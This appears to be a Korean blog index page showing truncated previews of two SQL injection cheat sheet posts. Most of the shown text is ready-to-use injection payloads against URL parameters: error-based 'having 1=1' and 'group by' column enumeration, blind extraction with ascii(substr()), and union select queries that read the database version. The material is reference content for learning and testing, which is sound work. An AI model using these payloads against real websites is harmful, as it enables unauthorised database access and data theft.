본문 바로가기

인젝션2

4. SQL INJECTION CHEAT SHEET (SQL 인젝션 치트 시트) 1. Error Based SQL InjectionHaving Error (This Column Name)- www.test.com/?no=1' having 1=1 #- www.test.com/?no=(1)having(1)in(1) Group by Having Error (Another Column Name)- www.test.com/?no=1' having 1=1-- (Column name)- www.test.com/?no=1' group by no having 1=1# -> name column error- www.test.com/?no=1' group by no, name having 1=1# -> code column erorr- www.test.com/?no=1' group by no, name.. 2020. 2. 4.
2. SQL INJECTION CHEAT SHEET (SQL 인젝션) 1. ?bid=if(1=1,52,2) : select bid from board where bid=if(1=1,52,2); 2. ?bid=if((1)like(1),1,2)# : select if((1)like(1),1,2); : select instr(1,1); 3. ?bid=52 or bid=if((select(ascii(substr((select(bid)from(board)where(bid)like(52)),1,1))))=1,52,0) 4. ?bid=52 union select (1)# : select bid from board where bid=52 union select (1); 5. ?bid=52 union select (version())# : select bid from board where.. 2019. 10. 20.

티스토리툴바